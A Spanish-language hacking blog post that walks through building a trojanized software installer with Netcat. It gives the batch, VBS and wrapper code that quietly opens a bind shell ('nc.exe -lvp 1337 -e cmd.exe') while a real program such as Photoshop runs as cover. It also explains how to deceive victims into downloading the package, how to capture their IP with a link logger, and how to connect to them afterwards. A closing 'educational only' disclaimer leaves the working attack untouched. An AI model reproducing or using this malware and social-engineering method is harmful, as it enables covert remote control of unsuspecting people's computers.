-¿Te unes?- ㊜Suscribete!!!

Install a Exploit Persistant Backdoor Using Netcat


Instale una puerta trasera persistente de explotación mediante Netcat
Netcat es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos). Fue originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Existen muchos forks de esta herramienta que añaden características nuevas como GNU Netcat o Cryptcat. wikipedia

Entre sus múltiples aplicaciones, es frecuente la depuración de aplicaciones de red. También es utilizada a menudo para abrir puertas traseras en un sistema.
Exploit remoto. Si utiliza una red de comunicaciones para entrar en contacto con el sistema víctima. Por ejemplo puede usar otro equipo dentro de la misma red interna o tener acceso desde la propia Internet.






⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫
Netcat descargar para windows
Bat To Exe Converter
Download IcoFX
Download & setup ngrok
netcat
Photoshop 
Download nc111nt.zip (password:nc) - Netcat for Windows
⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫
Netcat descargar para linux
⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫
Netcat descargar para termux

  • pkg install git
  • pkg install sh
  • pkg install nc
  • pkg install php
  • pkg install openssh
  • git clone https://github.com/Pericena/cat
  • cd cat
  • bash cat.sh
  • nc %puerto%


⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫
Termux Instalar Ngrok
https://lpericena.blogspot.com/2020/05/termux-instalar-ngrok.html
⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫


Linea de comando

La línea básica de comandos para Netcat es nc [opciones] host puertos, donde host es la dirección IP que se desea analizar y puertos es o un  determinado puerto o un rango de puertos o una serie de puertos separados por espacios. Echemos un vistazo a cada una de las opciones.
-help
  • -d Permite que nc trabaje en forma silenciosa y se desenganche del indicador de comandos MS-DOS.
  • -e Un nc a la escucha podrá ejecutar el en el instante en que alguien se conecte al puerto en el que está escuchando.
  • -i Intervalo de espera, que es la cantidad de tiempo que nc esperará entre dos envíos de datos sucesivos.
  • -g Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP.
  • -G Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g.
  • -l Activa el modo escucha de nc.
  • -L Activa el modo escucha de nc pero con más interés.
  • -n Indica a nc que no realice ninguna consulta de nombres de hosts.
  • -o Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal.
  • -p Le permite especificar el puerto local que va a utilizar nc.
  • -r Nc elegirá aleatoriamente los puertos locales y remotos.
  • -s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.
  • -t Es capaz de controlar la negociación de opciones Telnet.
  • -u Indica a nc que utilice UDP en lugar de TCP.
  • -v Informa el estado de nc, si pones otra –v podrás obtener más información.
  • -w Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexión.
  • -z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo.
⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫⇜✫⇝✫
Ingeniería social 
lo que aremos es hacerle creer a nuestra victima que le pasaremos un programa "x" ejemplo :photoshop ,hack ,ultraiso,vpn, otros programas . Todos los archivos deben ser subido en un servidor de almacenamiento , para lograr nuestro objetivo debemos ponerlo en un acortado de link llamados iplogger   lo encontras en este link :) https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html 


enviar este link a la victima pero antes debemos acortar el link con iplogger https://www.mediafire.com/file/zc6z11ln09sv4ga/Programa.zip/file

Instalación victima
Una vez descarga los programas lo que ara el xploits sera instalar el programa real , pero mientras tanto se ejecutara el payloads en segundo plano abriendo un shell remota .
☆・。。・゜゜・。。・゜★
El comando que se ejecutara sera nc.exe -lvp 1337 -e cmd.exe


☆・。。・゜゜・。。・゜★
Código de payloads.exe
╔═══════ ≪ °❈° ≫ ═══════╗
@echo off
TITLE Remote
cls
cd programa
nc.exe -lvp 1337 -e cmd.exe
╚═══════ ≪ °❈° ≫ ═══════╝

payloads.exe nos permitirá abrir una puerta de enlace

Código de script.vbs
╔═══════ ≪ °❈° ≫ ═══════╗
Set WshShell=CreateObject("WScript.Shell")
WshShell.Run chr(34) & "payloads.exe" & Chr(34),0
Set WshShell=Nothing
 ╚═══════ ≪ °❈° ≫ ═══════╝
script.vbs nos permitira ejecutar el payloads en segundo plano

Código xploits.exe
╔═══════ ≪ °❈° ≫ ═══════╗
@echo off
TITLE install
cls
cd programa
start PSCS6.exe
start script.vbs
exit
 ╚═══════ ≪ °❈° ≫ ═══════╝
xploits.exe nos permitirá ejecutar el archivo vbs y exe

Observamos que nuestro expoits esta funcionando el programa photoshop funciona correctamente al igual que el script.vbs se ejecuta en segundo plano con el puerto 1337

☆・。。・゜゜・。。・゜★
Conexión atacante 
Para este ataque necesitamos la ip de la victima como sabemos el puerto que usaremos sera 1337 , al usar el link de acortadores link aquí (0.0)=" https://lpericena.blogspot.com/2019/09/grabify-geolocalizacion-traves-de-enlace.html " podemos también obtener la ip del visitante en este caso seria la victima

✎windows 
ejecutamos el nc.exe para poder introducir los datos o usar en la shell nc -n -v ip 1337
 pero tenemos otra opción ejecutando xploitsnc.exe

☆・。。・゜゜・。。・゜★

✎Linux 
introducimos en shell nc IP 1337 o ncat IP 1337 pero también tenemos otra opción usando un script en bash para poder ejecutar la tarea de conexión


☆・。。・゜゜・。。・゜★

✎Termux
abrimos la app introducimos en nuestra terminal el comando  nc IP 1337 
De esa manera podemos tener acceso a un dispositivo


☆・。。・゜゜・。。・゜★












☆・。。・゜゜・。。・゜★ 
https://www.mediafire.com/file/zc6z11ln09sv4ga/Programa.zip/file


█▌│▌║▌ │█│║││█│
  
Conviértete en el mayor hacker del mundo Descarga gratis la app The Seven Codes y comparte
Google play

ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. 
NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL. 
PERMANECE LEGAL. 
GRACIAS! 
Si tienes algún problema, deja un comentario y comparte tú opinión. 
¿Ha quedado contestada su pregunta? 


Comentarios

Entradas populares de este blog

CiclopeClic: Generador de Enlaces con IA para Campañas Phishing

Instalar DoxWeb con Termux

Doxing Espionaje y Recopilación de Información

banner logo

📽video

Únete al chat

Comentarios

Blog Populares

Instalar DoxWeb con Termux

Instalar Metasploit-Framework En Android Con Termux

Termux Instalar Ngrok

Hackear contraseñas WiFi con Python fácilmente con este sencillo script

Generar combos+verificar cuentas para spotify

👻 By Blog

By Luishiño

Security

Compartir el Link

Copiar

Estamos en constante crecimiento


× IMPORTANTE!

»El autor de este blog tiene como objetivo principal facilitar el acceso a información

sobre seguridad informática, tecnología, programación, técnicas de hacking e inteligencia artificial.

Es importante destacar que el blog está destinado exclusivamente a fines educativos y NO promueve actividades ilegales.

El autor se desliga de cualquier responsabilidad sobre descargas, opiniones y comentarios de los textos que se citen en el blog.

La misión principal es compartir conocimiento responsable para mejorar la seguridad digital y promover el uso ético de la tecnología.

Se hace un llamado a los lectores para utilizar sus habilidades de manera responsable y nunca para dañar a otros.

Descarga gratis la app The Seven Codes y comparte con tus amig@s

Google play

Esta obra de Luishiño está bajo una Licencia Creative Commons Atribución-NoComercial-CompartirIgual CC BY-NC-SA 4.0 Internacional

Aviso Legal


>_Si te gustan los contenidos de este sitio,
¿Deseas realizar una aportación?
Puedes colaborar con una pequeña donación via PayPal. La forma rápida y segura de pagar en Internet. シ

Apoyar al sitio


📡Los interesados en información sobre contrato de soporte Asistencia Técnica , licencia de uso/actualizaciones de sus utilidades, contacten con The Seven Codes para hacer su presupuesto y/o consultar por el servicio al twitter:@Lpericena

Mis redes sociales

© Copyright 2020-2024 .Todos los derechos reservados
by Luishiño - The Seven Codes